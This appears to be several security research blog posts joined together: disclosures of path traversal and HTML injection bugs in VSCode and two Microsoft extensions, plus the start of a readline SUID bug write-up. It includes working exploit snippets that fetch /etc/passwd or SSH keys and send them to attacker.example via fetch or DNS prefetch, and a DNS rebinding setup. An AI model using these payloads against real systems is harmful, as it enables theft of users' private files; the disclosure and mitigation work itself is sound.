While exploiting the vulnerabilities detailed in the last post, I wondered if there could be bugs in VSCode itself that would allow us to bypass any security feature that limits what a Webview can do. In particular, I was curious if we could still exploit the bug we found in the SARIF Viewer extension (vulnerability 1 in part 1) if there were stricter rules in the Webview’s localResourceRoots option.

From the last post’s SARIF viewer exploit, we learned that you can always exfiltrate files using DNS prefetches if you have the following preconditions:

  • You can execute JavaScript in a Webview. This enables you to add link tags to the DOM.
  • The CSP’s connect-src directive has the .vscode-resource.vscode-cdn.net source. This enables you to fetch local files.

…Files within the localResourceRoots folders, that is! This option limits the folders from which a Webview can read files, and, in the SARIF viewer, it was configured to limit, well… nothing. But such a permissive localResourceRoots is rare. Most extensions only allow access to files in the current workspace and in the extensions folder (the default values for the localResourceRoots option).

Recall that Webviews read files by fetching the https://file+.vscode-resource.vscode-cdn.net “fake” domain, as shown in the example below.

Example of how to fetch a file from a VSCode extension Webview
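For example, JavaScript running inside a Webview can read a file within the allowed roots with something like the following (the path is a placeholder):

(async () => {
  // The "fake" domain is intercepted by VSCode, which returns the file contents.
  const uri = 'https://file+.vscode-resource.vscode-cdn.net/path/inside/an/allowed/root.txt';
  const response = await fetch(uri);
  console.log(await response.text());
})();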

Without even looking at how the code enforced the localResourceRoots option, I started playing around with different path traversal payloads with the goal of escaping from the root directories where we are imprisoned. I tried a few payloads, such as:

  • /etc/passwd
  • /../../../../../etc/passwd
  • /[valid_root]/../../../../../etc/passwd

As I expected, this didn’t work. The browser normalized the request’s path even before it reached VSCode, as shown in the image below.

Unsuccessful fetches of the /etc/passwd file

I started trying different variants that the browser would not normalize, but that some VSCode logic might consider a valid path. In about three minutes, to my surprise, I found out that using %2f.. instead of /.. allowed us to escape the root folder(!!!).

Successful fetch of the /etc/passwd file when using the / character URL encoded as %2f

We’ve escaped! We can now fetch files from anywhere in the filesystem. But why did this work? VSCode seems to decode the %2f, but I couldn’t really understand what was happening under the hood. My initial assumption was that the function that reads the file (e.g., the fs.readFile function) was decoding the %2f, while the path normalization function did not. As we’ll see, this was not a bad guess, but not quite the real cause.

Root cause analysis

Let’s start from the beginning and see how VSCode handles vscode-resource.vscode-cdn.net requests—remember, this is not a real domain.

It all starts in the service worker running on the Webview. This service worker intercepts every Webview’s request to the vscode-resource.vscode-cdn.net domain and transforms it into a postMessage('load-resource') to the main VSCode thread.

Code from the Webview’s service worker that intercepts fetch requests that start with vscode-resource.vscode-cdn.net and transforms them into a postMessage to the main VSCode thread (source)

VSCode will handle the postMessage('load-resource') call by building a URL object and calling loadResource, as shown below.

VSCode code that handles a load-resource postMessage. Highlighted in red is the code that decodes the fetched path—the first reason why our exploit works. (source)

Notice that the URL path is decoded with decodeURIComponent. This is why our %2f is decoded! But this alone still doesn’t explain why the path traversal works. Normalizing the path before checking if the path belongs to one of the roots would prevent our exploit. Let’s keep going.

The loadResource function simply calls loadLocalResource with roots: localResourceRoots.

The loadResource function calling loadLocalResource with the localResourceRoots option (source)

Then, the loadLocalResource function calls getResourceToLoad, which will iterate over each root in localResourceRoots and check if the requested path is in one of these roots. If all checks pass, loadLocalResource reads and returns the file contents, as shown below.

Code that checks if a path is within the expected root folders and returns the file contents on success. Highlighted in red is the .startsWith check without any prior normalization—the second reason our exploit works. (source)

There is no path normalization, and the root check is done with resourceFsPath.startsWith(rootPath). This is why our path traversal works! If our path is [valid-root-path]/../../../../../etc/issue, we’ll pass the .startsWith check even though our path points to somewhere outside of the root.
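A simplified Node.js illustration of the failing check (not VSCode’s actual code):

const path = require('path');

const rootPath = '/home/user/project';                   // one of the localResourceRoots
const resourceFsPath = rootPath + '/../../../etc/issue'; // the decoded, traversing path

console.log(resourceFsPath.startsWith(rootPath));        // true: the check passes
console.log(path.normalize(resourceFsPath));             // '/etc/issue': outside the root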

In summary, two mistakes allow our exploit:

  • VSCode calls decodeURIComponent(path) on the path, decoding %2f to /. This allows us to bypass the browser’s normalization and introduce ../ sequences in the path.
  • The containsResource function checks that the requested file is within the expected localResourceRoots folder with the startsWith function without first normalizing the path (i.e., removing the ../ sequences). This allows us to traverse outside the root with a payload such as [valid-root-path]/../../../.

This bug is hard to spot by just manually auditing the code. The layers of abstraction and all the message passing mask where our data flows through, as well as some of the critical details that make the exploit work. This is why evaluating and testing software by executing the code and observing its behavior at runtime—dynamic analysis—is such an important part of auditing complex systems. Finding this bug through static analysis would require defining sources, sinks, sanitizers, and an interprocedural engine capable of understanding data that is passed in postMessage calls. After all that work, you may still end up with a lot of false positives and false negatives; we use static analysis tools extensively at Trail of Bits, but they’re not the right tool for this job.

Recommendations for preventing path traversals

In the last blog’s third vulnerability, we examined a path traversal vulnerability caused by parsing a URL’s query string with flawed hand-coded logic that allowed us to circumvent the path normalization done by the browser. These bugs are very similar; in both cases, URL parsing differences and the reliance on the browser to do path normalization resulted in path traversal vulnerabilities with critical consequences.

So, when handling URLs, we recommend following these principles:

  • Parse the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
  • Do not transform any URL components after normalization unless there is a very good reason to do so. As we’ve seen, even decoding the path with a call to decodeURIComponent(path) was enough to fully bypass the localResourceRoots feature since other parts of the code had assumptions that the browser would have normalized the path. If you want to read more about URL parsing discrepancies and how they can lead to critical bugs, I recommend reading A New Era of SSRF by Orange Tsai and Exploiting URL Parsing Confusion.
  • Always normalize the file path before checking if the file is within the expected root. Doing both operations together, ideally in the same encapsulated function, ensures that no future or existing code will transform the path in any way that invalidates the normalization operation.
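As an illustration of that last recommendation, here is a hedged Node.js sketch of a containment check that normalizes before comparing:

const path = require('path');

function isWithinRoot(requestedPath, rootPath) {
  const normalized = path.normalize(requestedPath);
  const relative = path.relative(rootPath, normalized);
  // Inside the root only if the relative path does not climb upward or jump elsewhere.
  return !relative.startsWith('..') && !path.isAbsolute(relative);
}

// isWithinRoot('/root/a/../../../etc/issue', '/root') === false
// isWithinRoot('/root/a/b.txt', '/root')              === true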

Timeline

  • September 7, 2022: Reported the bug to Microsoft
  • September 16, 2022: Microsoft confirmed the behavior in the report and mentioned that the case was being reviewed for a possible bounty award
  • September 20, 2022: Microsoft marked the report as out of scope for a bounty because “VS code extensions are not eligible for bounty award”
  • September 21, 2022: I replied, pointing out that the bug is in the way VSCode interacts with extensions, not in a VSCode extension
  • September 24, 2022: Microsoft acknowledged its mistake and awarded the bug a $7,500 bounty
  • October 11, 2022: Microsoft fixed the bug in PR #163327 and assigned it CVE-2022-41042

Escaping misconfigured VSCode extensions

By Vasco Franco

TL;DR: This two-part blog series will cover how I found and disclosed three vulnerabilities in VSCode extensions and one vulnerability in VSCode itself (a security mitigation bypass assigned CVE-2022-41042 and awarded a $7,500 bounty). We will identify the underlying cause of each vulnerability and create fully working exploits to demonstrate how an attacker could have compromised your machine. We will also recommend ways to prevent similar issues from occurring in the future.

A few months ago, I decided to assess the security of some VSCode extensions that we frequently use during audits. In particular, I looked at two Microsoft extensions: SARIF viewer, which helps visualize static analysis results, and Live Preview, which renders HTML files directly in VSCode.

Why should you care about the security of VSCode extensions? As we will demonstrate, vulnerabilities in VSCode extensions—especially those that parse potentially untrusted input—can lead to the compromise of your local machine. In both the extensions I reviewed, I found a high-severity bug that would allow an attacker to steal all of your local files. With one of these bugs, an attacker could even steal your SSH keys if you visited a malicious website while the extension is running in the background.

During this research, I learned about VSCode Webviews—sandboxed UI panels that run in a separate context from the main extension, analogous to an iframe in a normal website—and researched avenues to escape them. In this post, we’ll dive into what VSCode Webviews are and analyze three vulnerabilities in VSCode extensions, two of which led to arbitrary local file exfiltration. We will also look at some interesting exploitation tricks: leaking files using DNS to bypass restrictive Content-Security-Policy (CSP) policies, using srcdoc iframes to execute JavaScript, and using DNS rebinding to elevate the impact of our exploits.

In an upcoming blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.

VSCode Webviews

Before diving into the bugs, it’s important to understand how a VSCode extension is structured. VSCode is an Electron application with privileges to access the filesystem and execute arbitrary shell commands; extensions have all the same privileges. This means that if an attacker can execute JavaScript (e.g., through an XSS vulnerability) in a VSCode extension, they can achieve a full compromise of the system.

As a defense-in-depth protection against XSS vulnerabilities, extensions have to create UI panels inside sandboxed Webviews. These Webviews don’t have access to the NodeJS APIs, which allow the main extension to read files and run shell commands. Webviews can be further limited with several options:

  • enableScripts: prevents the Webview from executing JavaScript if set to false. Most extensions require enableScripts: true.
  • localResourceRoots: prevents Webviews from accessing files outside of the directories specified in localResourceRoots. The default is the current workspace directory and the extension’s folder.
  • Content-Security-Policy: mitigates the impact of XSS vulnerabilities by limiting the sources from which the Webview can load content (images, CSS, scripts, etc.). The policy is added through a meta tag of the Webview’s HTML source, such as:
     <meta http-equiv="Content-Security-Policy" content="default-src 'none';">

Sometimes, these Webview panels need to communicate with the main extension to pass some data or ask for a privileged operation that they cannot perform on their own. This communication is achieved by using the postMessage() API.

Below is a simple, commented example of how to create a Webview and how to pass messages between the main extension and the Webview.

Example of a simple extension that creates a Webview
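A minimal TypeScript sketch in that spirit (the view type, messages, and HTML below are made up for illustration):

import * as vscode from 'vscode';

export function createPanel(context: vscode.ExtensionContext) {
  const panel = vscode.window.createWebviewPanel(
    'example.panel',   // hypothetical view type
    'Example Panel',
    vscode.ViewColumn.One,
    {
      enableScripts: true,                         // the Webview needs to run JavaScript
      localResourceRoots: [context.extensionUri],  // restrict which files it can read
    }
  );

  // HTML rendered inside the Webview; note the Content-Security-Policy meta tag.
  panel.webview.html = `<!DOCTYPE html>
    <html>
      <head>
        <meta http-equiv="Content-Security-Policy"
              content="default-src 'none'; script-src 'unsafe-inline';">
      </head>
      <body>
        <script>
          const vscodeApi = acquireVsCodeApi();
          // Ask the extension to perform a privileged operation on our behalf.
          vscodeApi.postMessage({ command: 'ping' });
          window.addEventListener('message', (event) => console.log(event.data));
        </script>
      </body>
    </html>`;

  // Messages from the Webview are handled in the (privileged) extension context.
  panel.webview.onDidReceiveMessage((message) => {
    if (message.command === 'ping') {
      panel.webview.postMessage({ command: 'pong' });
    }
  });
}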

An XSS vulnerability inside the Webview should not lead to a compromise if the following conditions are true: localResourceRoots is correctly set up, the CSP correctly limits the sources from which content can be loaded, and no postMessage handler is vulnerable to problems such as command injection. Still, you should not allow arbitrary execution of untrusted JavaScript inside a Webview; these security features are in place as a defense-in-depth protection. This is analogous to how a browser does not allow a renderer process to execute arbitrary code, even though it is sandboxed.

You can read more about Webviews and their security model in VSCode’s documentation for Webviews.

Now that we understand Webviews a little better, let’s take a look at three vulnerabilities that I found during my research and how I was able to escape Webviews and exfiltrate local files in two VSCode extensions built by Microsoft.

Vulnerability 1: HTML/JavaScript injection in Microsoft’s SARIF viewer

Microsoft’s SARIF viewer is a VSCode extension that parses SARIF files—a JSON-based file format into which most static analysis tools output their results—and displays them in a browsable list.

Since I use the SARIF viewer extension in all of our audits to triage static analysis results, I wanted to know how well it was protected against loading untrusted SARIF files. These untrusted files can be downloaded from an untrusted source or, more likely, result from running a static analysis tool—such as CodeQL or Semgrep—with a malicious rule containing metadata that can manipulate the resulting SARIF file (e.g., the finding’s description).

While examining the code where the SARIF data is rendered, I came across a suspicious-looking snippet in which the description of a static analysis result is rendered using the ReactMarkdown class with the escapeHtml option set to false.

Code that unsafely renders the description of a finding parsed from a SARIF file (source)

Since HTML is not escaped, by controlling the markdown field of a result's message, we can inject arbitrary HTML and JavaScript in the Webview. I quickly threw together a proof of concept (PoC) that automatically executed JavaScript using the onerror handler of an img tag with an invalid source.

Portion of a SARIF file that triggers JavaScript execution in the SARIF Viewer extension
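
Roughly, a payload like the following (a sketch trimmed to the relevant field, not the original PoC) is enough:

{
  "version": "2.1.0",
  "runs": [{
    "tool": { "driver": { "name": "any-tool" } },
    "results": [{
      "ruleId": "demo",
      "message": {
        "markdown": "<img src='x' onerror='console.log(\"JS running in the Webview\")'>"
      }
    }]
  }]
}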

It worked! The picture below shows the exploit in action.

PoC exploit in action. On the right, we see the JavaScript injected in the DOM. On the left, we see where it is rendered.

This was the easy part. Now, we need to weaponize this bug by fetching sensitive local files and exfiltrating them to our server.

Fetching local files

Our HTML injection is inside a Webview, which, as we saw, is limited to reading files inside its localResourceRoots. The Webview is created with the following code:

Code that creates the Webview in the SARIF viewer extension with an unsafe localResourceRoots option (source)

As we can see, localResourceRoots is configured very poorly. It allows the Webview to read files from anywhere on the disk, up to the z: drive! This means that we can just read any file we want—for example, a user’s private key at ~/.ssh/id_rsa.

Inside the Webview, we cannot open and read a file since we don’t have access to NodeJS APIs. Instead, we make a fetch to https://file+.vscode-resource.vscode-cdn.net/, and the file contents are sent in the response (if the file exists and is within the localResourceRoots path).

To leak /etc/issue, all we need is to make the following fetch:

Example of code that reads the /etc/issue file inside a Webview
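
In the Webview, that fetch looks roughly like this (a sketch):

fetch('https://file+.vscode-resource.vscode-cdn.net/etc/issue')
  .then((response) => response.text())
  .then((contents) => console.log(contents));  // file contents, courtesy of the broad localResourceRoots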

Exfiltrating files

Now, we just need to send the file contents to our remote server. Normally, this would be easy; we would make a fetch to a server we control with the file’s contents in the POST body or in a GET parameter (e.g., fetch('https://our.server.com?q=')).

However, the Webview has a fairly restrictive CSP. In particular, the connect-src directive restricts fetches to self and https://*.vscode-cdn.net. Since we don’t control either source, we cannot make fetches to our attacker-controlled server.

CSP of the SARIF viewer extension’s Webview (source)

We can circumvent this limitation with, you guessed it, DNS! By injecting link tags with the rel="dns-prefetch" attribute, we can leak file contents in subdomains even with the restrictive CSP connect-src directive.

Example of HTML code that leaks files using DNS to circumvent a restrictive CSP

To leak the file, all we need to do is encode the file in hex and inject link tags in the DOM whose href points to our attacker-controlled server with the encoded file contents in the subdomains. We just need to ensure that each subdomain has at most 64 characters (including the .s) and that the whole subdomain has less than 256 characters.
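
As a rough sketch (assuming fileContents holds the data fetched in the previous step; attacker.example and the chunk size are placeholders), the injected JavaScript could look like this:

const fileContents = 'data fetched in the previous step';  // placeholder
const hex = Array.from(new TextEncoder().encode(fileContents))
  .map((b) => b.toString(16).padStart(2, '0'))
  .join('');
for (let i = 0; i < hex.length; i += 60) {
  const link = document.createElement('link');
  link.rel = 'dns-prefetch';
  // the data travels in the DNS lookup for the subdomain, so connect-src never applies
  link.href = '//' + i + '.' + hex.slice(i, i + 60) + '.attacker.example';
  document.head.appendChild(link);
}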

Putting it all together

By combining these techniques, we can build an exploit that exfiltrates the user’s $HOME/.ssh/id_rsa file. Here is the commented exploit:

Exploit that steals a user’s private key when they open a compromised SARIF file in the SARIF viewer extension

This was all possible because the extension used the ReactMarkdown component with the escapeHtml = {false} option, allowing an attacker with partial control of a SARIF file to inject JavaScript in the Webview. Thanks to a very permissive localResourceRoots, the attacker could take any file from the user’s filesystem. Would this vulnerability still be exploitable with a stricter localResourceRoots? Wait for the second blog post! ;)

To detect these issues automatically, we improved Semgrep's existing ReactMarkdown rule in PR #2307. Try it out against React codebases with semgrep --config "p/react".

Vulnerability 2: HTML/JavaScript injection in Microsoft’s Live Preview extension

Microsoft’s Live Preview, a VSCode extension with more than 1 million installs, allows you to preview HTML files from your current workspace in an embedded browser directly in VSCode. I wanted to understand if I could safely preview malicious HTML files using the extension.

The extension starts by creating a local HTTP server on port 3000, where it hosts the current workspace directory and all of its files. Then, to render a file, it creates an iframe that points to the local HTTP server (e.g., <iframe src="http://localhost:3000/file.html">) inside a Webview panel. (Sandboxing inception!) This architecture allows the file to execute JavaScript without affecting the main Webview.

The inner preview iframe and the outer Webview communicate using the postMessage API. If we want to inject HTML/JavaScript in the Webview, its postMessage handlers are a good place to start!

Finding an HTML/JavaScript injection

We don’t have to look hard! The link-hover-start handler is vulnerable to HTML injection because it directly passes input from the iframe message (which we control the contents of) to the innerHTML attribute of an element of the Webview without any sanitization. This allows an attacker to control part of the Webview’s HTML.

Code where the innerHTML of a Webview element is set to the contents of a message originating from the HTML file being previewed. (source)
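
The vulnerable pattern boils down to something like this (element and field names are illustrative, not the extension's exact code):

window.addEventListener('message', (event) => {
  switch (event.data.command) {
    case 'link-hover-start':
      // event.data.text originates in the previewed (attacker-controlled) iframe
      document.getElementById('link-preview').innerHTML = event.data.text;
      break;
  }
});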

Achieving JavaScript execution with srcdoc iframes

The naive approach of setting innerHTML to

 <script> console.log('HELLO'); </script> 

does not work because the script is added to the DOM but does not get loaded. Thankfully, there’s a neat trick we can use to circumvent this limitation: writing the script inside an srcdoc iframe, as shown in the figure below.

PoC that uses an srcdoc iframe to trigger JavaScript execution when set to the innerHTML of a DOM element
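
A sketch of the idea:

const payload = '<iframe srcdoc="<script>console.log(1)</script>"></iframe>';
document.body.innerHTML = payload;  // the srcdoc script loads, unlike a directly injected <script>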

The browser considers srcdoc iframes to have the same origin as their parent windows. So even though we just escaped one iframe and injected another, this srcdoc iframe will have access to the Webview’s DOM, global variables, and functions.

The downside is that the iframe is now ruled by the same CSP as the Webview.

default-src 'none';
connect-src ws://127.0.0.1:3001/ 'self';
font-src 'self' https://*.vscode-cdn.net;
style-src 'self' https://*.vscode-cdn.net;
script-src 'nonce-<nonce value>';
frame-src http://127.0.0.1:3000;
CSP of the Live Preview extension’s Webview (source)

In contrast with the first vulnerability, this CSP's script-src directive does not include unsafe-inline, but instead uses a nonce-based source. This means that we need to know the nonce to be able to inject our arbitrary JavaScript. We have a few options to accomplish this: brute-force the nonce, recover the nonce due to poor randomness, or leak the nonce.

The nonce is generated with the following code:

Code that generates the nonce used in the CSP of the Live Preview extension’s Webview (source)
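
The generator is equivalent to something like this (a sketch consistent with the description below: 64 characters drawn from a 62-character alphabet using Math.random):

function getNonce() {
  let text = '';
  const possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  for (let i = 0; i < 64; i++) {
    text += possible.charAt(Math.floor(Math.random() * possible.length));
  }
  return text;
}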

Brute-forcing the nonce

While we can try as many nonces as we please without repercussion, the nonce has a length of 64 with an alphabet of 62 characters, so the universe would end before we found the right one.

Recovering the nonce due to poor randomness

An astute reader might have noticed that the nonce-generating function uses Math.random, a cryptographically unsafe random number generator. Math.random uses the xorshift128+ algorithm behind the scenes, and, given X random numbers, we can recover the algorithm’s internal state and predict past and future random numbers. See, for example, the Practical Exploitation of Math.random on V8 conference talk, and an implementation of the state recovery.

My idea was to call Math.random repeatedly in our inner iframe and recover the state used to generate the nonce. However, the inner iframe, the outer Webview, and the main extension that created the random nonce have different instances of the internal algorithm state; we cannot recover the nonce this way.

Leaking the nonce

The final option was to leak the nonce. I searched the Webview code for postMessage handlers that sent data into the inner iframe (the one we control) in the hopes that we could somehow sneak in the nonce.

Our best bet is the findNext function, which sends the value of the find-input element to our iframe.

Code that shows the Webview sending the contents of the find-input value to the previewed page (source)

My goal was to somehow make the Webview attach the nonce to a "fake" find-input element that we would inject using our HTML injection. I dreamed of injecting an incomplete element like <input id="find-input" value=", which would create a "fake" element with the find-input ID and open its value attribute without closing it. However, this was doomed to fail for multiple reasons. First, we cannot escape from the element we are setting the innerHTML to, and since we are writing it in full, it could never contain the nonce. Second, the DOM parser does not parse the HTML in the example above; our element is just left empty. Finally, document.getElementById('find-input') always finds the already existing element, not the one we injected.

At this point, I was at a dead end; the CSP effectively prevented the full exploit. But I wanted more! In the next vulnerability, we’ll look at another bug that I used to fully exploit the Live Preview extension without injecting any JavaScript in the Webview.

Vulnerability 3: Path traversal in the local HTTP server in Microsoft’s Live Preview extension

Since we couldn’t get around the CSP, I thought another interesting place to investigate was the local HTTP server that serves the HTML files to be previewed. Could we fetch arbitrary files from it or could we only fetch files in the current workspace?

The HTTP server will serve any file in the current workspace, allowing an HTML file to load JavaScript files or images in the same workspace. As a result, if you have sensitive files in your current workspace and preview a malicious HTML file in the same workspace, the malicious file can easily fetch and exfiltrate the sensitive files. But this is by design, and it is unlikely that a user’s workspace will have both malicious and sensitive files. Can we go further and leak files from elsewhere on the filesystem?

Below is a simplified version of the code that handles each HTTP request.

Code that serves requests in the Live Preview extension's local HTTP server (source)
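
In spirit, the handler does something like the following (a condensed sketch with assumed names; basePath is the workspace root):

const http = require('http');
const path = require('path');
const fs = require('fs');

const basePath = '/path/to/current/workspace';  // workspace root (illustrative)

http.createServer((req, res) => {
  // the query string is split off with lastIndexOf('?') -- more on this below
  const queryIndex = req.url.lastIndexOf('?');
  const URLPathName = queryIndex >= 0 ? req.url.slice(0, queryIndex) : req.url;
  // joined directly with the workspace root; nothing re-checks that the result stays inside it
  const absolutePath = path.join(basePath, URLPathName);
  fs.readFile(absolutePath, (err, data) => {
    if (err) { res.writeHead(404); return res.end(); }
    res.end(data);
  });
}).listen(3000);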

My goal was to find a path traversal vulnerability that would allow me to escape the basePath root.

Finding a path traversal bug

The simple approach of calling fetch("../../../../../../etc/passwd") does not work because the browser normalizes the request to fetch("/etc/passwd"). However, the server logic does not prevent this path traversal attack; the following cURL command retrieves the /etc/passwd file!

curl --path-as-is http://127.0.0.1:3000/../../../../../../etc/passwd
cURL command that demonstrates that the server does not prevent path traversal attacks

This can’t be achieved through a browser, so this exploitation path is infeasible. However, I noticed slight differences in how the browser and the HTTP server parse the URL that may allow us to pull off our path traversal attack. The server uses hand-coded logic to parse the URL’s query string instead of using the JavaScript URL class, as shown in the snippet below.

Code with hand-coded logic to parse a URL’s query string (source)

This code splits the query string from the URL using lastIndexOf('?'). However, a browser will parse a query string from the first index of ?. By fetching ?../../../../../../etc/passwd?AAA the browser will not normalize the ../ sequences because they are part of the query string from the browser’s point of view (in green in the figure below). From the server’s point of view (in blue in the figure below), only AAA is part of the query string, so the URLPathName variable will be set to ?../../../../../../etc/passwd, and the full path will be normalized to /etc/passwd with path.join(basePath ?? '', URLPathName). We have a path traversal!

URL parsing differences between the browser and the server

Exploitation scenario 1

If an attacker controls a file that a user opens with the VSCode Live Preview extension, they can use this path traversal to leak arbitrary user files and folders.

In contrast with vulnerability 1, this exploit is quite straightforward. It follows these simple steps:

  1. From the HTML file being previewed, fetch the file or directory that we want to leak with fetch("http://127.0.0.1:3000/?../../../../../../../../../etc/passwd?"). (Note that we can see the fetch results even without a CORS policy because our exploit file is also hosted on the http://127.0.0.1:3000 origin.)
  2. Encode the file contents in base64 with leaked_file_b64 = btoa(leaked_file).
  3. Send the encoded file to our attacker-controlled server with fetch("http://?q=" + leaked_file_b64).

Here is the commented exploit:

Exploit that exfiltrates local files when a user previews a malicious HTML file with the Live Preview extension
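
A sketch that follows the three steps above (attacker.example stands in for the attacker-controlled server):

async function leak(targetPath) {
  // 1. Path traversal through the local Live Preview server (same origin as this page)
  const res = await fetch('http://127.0.0.1:3000/?../../../../../../..' + targetPath + '?');
  const contents = await res.text();
  // 2. Base64-encode the loot
  const encoded = btoa(contents);
  // 3. Ship it off to the attacker-controlled server
  await fetch('https://attacker.example/?q=' + encodeURIComponent(encoded));
}
leak('/etc/passwd');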

Exploitation scenario 2

The previous attack scenario works only if a user previews an attacker-controlled file, which makes the exploit hard to use in practice. But we can go further! Using DNS rebinding (a common technique to exploit unauthenticated internal services), we can increase the vulnerability's impact by requiring only that the victim visit an attacker's website while the Live Preview HTTP server is running in the background.

In a DNS rebinding attack, an attacker changes a domain’s DNS record between two IPs—the attacker server’s IP and the local server’s IP (commonly 127.0.0.1). Then, by using JavaScript to fetch this changing domain, an attacker will trick the browser into accessing local servers without any CORS warnings since the origin remains the same. For a more complete explanation of DNS Rebinding attacks, see this blog post.

To set up our exploit, we’ll do the following:

  1. Host our attacker-controlled server with the exploit at 192.168.13.128:3000.
  2. Use the rbndr service with the 7f000001.c0a80d80.rbndr.us domain that flips its DNS record between 192.168.13.128 and 127.0.0.1.

(NOTE: If you want to reproduce this setup, ensure that running host 7f000001.c0a80d80.rbndr.us will alternate between the two IPs. This works flawlessly on my Linux machine, with 8.8.8.8 as the DNS server.)

To steal a victim’s local files, we need to make them browse to the 7f000001.c0a80d80.rbndr.us URL, hoping that it will resolve to our server with the exploit. Then, our exploit page makes fetches with the path traversal attack on a loop until the browser makes a DNS request that resolves to the 127.0.0.1 IP; once it does so, we get the content of the sensitive file. Here is the commented exploit:

Exploit that exfiltrates local files when a user visits a malicious web page while the Live Preview extension is running in the background
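
In outline, the page served from the rebinding domain does something like this (a sketch; the success heuristic and attacker.example are illustrative):

async function rebindAndLeak(targetPath) {
  for (;;) {
    try {
      // Same-origin fetch: once the DNS record flips to 127.0.0.1, this hits the Live Preview server
      const res = await fetch('/?../../../../../../..' + targetPath + '?', { cache: 'no-store' });
      const body = await res.text();
      if (!body.includes('rebindAndLeak')) {  // crude check that this is not our own exploit page
        await fetch('https://attacker.example/?q=' + encodeURIComponent(btoa(body)));
        return;
      }
    } catch (err) { /* request failed; retry */ }
    await new Promise((resolve) => setTimeout(resolve, 1000));
  }
}
rebindAndLeak('/etc/passwd');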

How to secure VSCode Webviews

Webviews have strong defaults and mitigations to minimize a vulnerability’s impact. This is great, and it totally prevented a full compromise in our vulnerability 2! However, these vulnerabilities also showed that extensions—even those built by Microsoft, the creators of VSCode—can be misconfigured. For example, vulnerability 1 is a glaring example of how not to set up the localResourceRoots option.

If you are building a VSCode extension and plan on using Webviews, we recommend following these principles:

  1. Restrict the CSP as much as possible. Start with default-src 'none' and add other sources only as needed. For the script-src directive, avoid using unsafe-inline; instead, use a nonce- or hash-based source. If you use a nonce-based source, generate the nonce with a cryptographically strong random number generator (e.g., crypto.randomBytes(16).toString('base64')), as in the sketch after this list.
  2. Restrict the localResourceRoots option as much as possible. Preferably, allow the Webview to read only files from the extension’s installation folder.
  3. Ensure that any postMessage handlers in the main extension thread are not vulnerable to issues such as SQL injection, command injection, arbitrary file writes, or arbitrary file reads.
  4. If your extension runs a local HTTP server, minimize the risk of path traversal attacks by:
    • Parsing the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
    • Checking if the file is within the expected root after normalizing the path and right before reading the file.
  5. If your extension runs a local HTTP server, minimize the risk of DNS rebinding attacks by:
    • Spawning the server on a random port and using the Webview’s portMapping option to map the random localhost port to a static one in the Webview. This will limit an attacker’s ability to fingerprint if the server is running and make it harder for them to brute-force the port. It has the added benefit of seamlessly handling cases where the hard-coded port is in use by another application.
    • Allowlisting the Host header with only localhost and 127.0.0.1 (like CUPS does). Alternatively, authenticate the local server.
  6. And, of course, don’t flow user input into .innerHTML—but you already knew that one. If you’re trying to add text to an element, use .innerText instead.
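
For instance, combining the first two recommendations might look like this (a sketch; the view type and media folder are illustrative):

import * as vscode from 'vscode';
import * as crypto from 'crypto';

export function createSecurePanel(context: vscode.ExtensionContext) {
  const panel = vscode.window.createWebviewPanel('securePanel', 'Secure Panel', vscode.ViewColumn.One, {
    enableScripts: true,
    // Only the extension's own assets are reachable from the Webview
    localResourceRoots: [vscode.Uri.joinPath(context.extensionUri, 'media')],
  });

  // Cryptographically strong nonce for the script-src directive
  const nonce = crypto.randomBytes(16).toString('base64');
  panel.webview.html = `<!DOCTYPE html><html>
    <head><meta http-equiv="Content-Security-Policy"
          content="default-src 'none'; script-src 'nonce-${nonce}';"></head>
    <body><script nonce="${nonce}">/* trusted code only */</script></body></html>`;
  return panel;
}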

If you follow these principles, you'll have a well-configured VSCode extension. Nothing can go wrong, right? In a second blog post, we'll examine a bug in VSCode itself that allows us to escape a Webview's sandbox even in a well-configured extension.

Timeline

  • August 12, 2022: Reported vulnerability 1 to Microsoft
  • August 13–16, 2022: Vulnerability 1 was fixed in c054421 and 98816d9
  • September 7, 2022: Reported vulnerabilities 2 and 3 to Microsoft
  • September 14, 2022: Vulnerability 2 fixed in 4e029aa
  • October 5, 2022: Vulnerability 3 fixed in 9d26055 and 88503c4

Readline crime: exploiting a SUID logic bug

By roddux // Rory M

I discovered a logic bug in the readline dependency that partially reveals file information when parsing the file specified in the INPUTRC environment variable. This could allow attackers to move laterally on a box where sshd is running, a given user is able to log in, and the user's private key is stored in a known location (/home/user/.ssh/id_rsa).

This bug was reported and patched back in February 2022, and chfn isn’t typically provided by util-linux anyway, so your boxen are probably fine. I’m writing about this because the exploit is amusing, as it’s made possible due to a happy coincidence of the readline configuration file parsing functions marrying up well to the format of SSH keys—explained further in this post.

TL;DR:

$ INPUTRC=/root/.ssh/id_rsa chfn
Changing finger information for user.
Password: 
readline: /root/.ssh/id_rsa: line 1: -----BEGIN: unknown key modifier
readline: /root/.ssh/id_rsa: line 2: b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn: no key sequence terminator


    ...


readline: /root/.ssh/id_rsa: line 37: avxwhoky6ozXEAAAAJcm9vdEBNQVRFAQI=: no key sequence terminator
readline: /root/.ssh/id_rsa: line 38: -----END: unknown key modifier
Office [b]: ^C
$

Finding the bug

I was recently enticed by SUID bugs after fawning over the Qualys sudo bug a while back. As I was musing through The Art of Software Security Assessment (vol. 2 wen?), I was spurred into looking at environment variables as an attack surface. With a couple of hours to kill, I threw an interposing library into /etc/ld.so.preload to log getenv calls:

#define _GNU_SOURCE
#include <dlfcn.h>
#include <syslog.h>

// gcc getenv.c -fPIC -shared -ldl -o getenv.so

char *(*_real_getenv)(const char *) = 0;
char *getenv(const char *name) {
      if(!_real_getenv) _real_getenv = dlsym(RTLD_NEXT, "getenv");
      char *res = _real_getenv(name);
      syslog(1, "getenv(\"%s\") => \"%s\"\n", name, res);
      return res;
}

NB: We’re just going to pretend this is how I did it from the get-go, and that I didn’t waste time screwing around trying to get SUID processes launched under gdb.

With the logging library in place, I ran find / -perm /4000 (yes, I Googled the arguments) to find all of the SUID binaries on my system.

